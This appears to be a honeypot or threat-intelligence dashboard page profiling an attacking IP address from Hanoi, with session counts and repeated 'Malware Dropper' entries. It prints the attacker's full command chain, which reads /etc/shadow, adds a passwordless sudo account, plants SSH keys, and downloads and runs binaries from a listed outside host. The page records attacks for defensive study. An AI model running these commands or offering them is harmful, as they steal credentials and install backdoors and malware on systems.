← Back to feed
Location
🇻🇳 VN / Hanoi
ASN
AS18403 · FPT Telecom Company
Cloud Provider
—
Total Events
705
Top 5% by volume
Agent Count
1
First / Last Seen
2026-05-15 05:15 — 2026-05-15 05:57
Attack Types
MITRE ATT&CK Techniques
Initial Access
Execution
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
Sessions
111 (23 with login)
Avg Depth Score
0.38
Commands Executed
67
Files Downloaded
63
Notable Commands
- uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon;echo Password123 |passwd daemon --stdin;mkdir ~/.ssh;chattr -ia ~/.ssh/* ~/.ssh;wget http://103.56.149.224/cacti/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;chmod 700 ~/ ~/.ssh;wget http://103.56.149.224/cacti/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;wget http://103.56.149.224/cacti/oto -O /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://103.56.149.224/cacti/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto
- chsh -s /bin/sh daemon
- /tmp/x
- /tmp/o
- /tmp/oto
Download URLs
- http://103.56.149.224/cacti/ns1.jpg
- http://103.56.149.224/cacti/ns3.jpg
- http://103.56.149.224/cacti/oto
Fingerprints
HASSH
SSH Client
Evidence Timeline
Malware Dropper
8c0cadd295bd
LOGIN
2
3
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
98570db8735a
LOGIN
2
4
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
940760553097
LOGIN
5
1
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon$ /tmp/x $ /tmp/o $ /tmp/oto
http://103.56.149.224/cacti/oto
Malware Dropper
86f152a913ab
LOGIN
2
3
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
c7906cf6c13e
LOGIN
2
4
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
8710ca3c20e4
LOGIN
5
1
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon$ /tmp/x $ /tmp/o $ /tmp/oto
http://103.56.149.224/cacti/oto
Malware Dropper
f8dc68658e50
LOGIN
2
3
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
9bab14c56ff8
LOGIN
2
4
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
fba9d88585ea
LOGIN
5
1
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon$ /tmp/x $ /tmp/o $ /tmp/oto
http://103.56.149.224/cacti/oto
Malware Dropper
0ebf4f4cd821
LOGIN
2
3
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
a7d7d68f69d2
LOGIN
2
4
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
9c7850a413f5
LOGIN
5
1
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon$ /tmp/x $ /tmp/o $ /tmp/oto
http://103.56.149.224/cacti/oto
Malware Dropper
c9c7ce633b28
LOGIN
2
3
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
7689e41b66f6
LOGIN
2
4
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
60f0758bc9b7
LOGIN
5
1
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon$ /tmp/x $ /tmp/o $ /tmp/oto
http://103.56.149.224/cacti/oto
Malware Dropper
aabc89843fbc
LOGIN
2
3
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
ba371afbf2f5
LOGIN
2
4
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
ed716cdb2bb8
LOGIN
5
1
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon$ /tmp/x $ /tmp/o $ /tmp/oto
http://103.56.149.224/cacti/oto
Malware Dropper
88459b4dd3a3
LOGIN
2
3
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
e091dc154655
LOGIN
2
4
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
20dbdd6b965b
LOGIN
5
1
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon$ /tmp/x $ /tmp/o $ /tmp/oto
http://103.56.149.224/cacti/oto
Malware Dropper
37c245767934
LOGIN
2
3
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
4bbe3bec7533
LOGIN
2
4
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto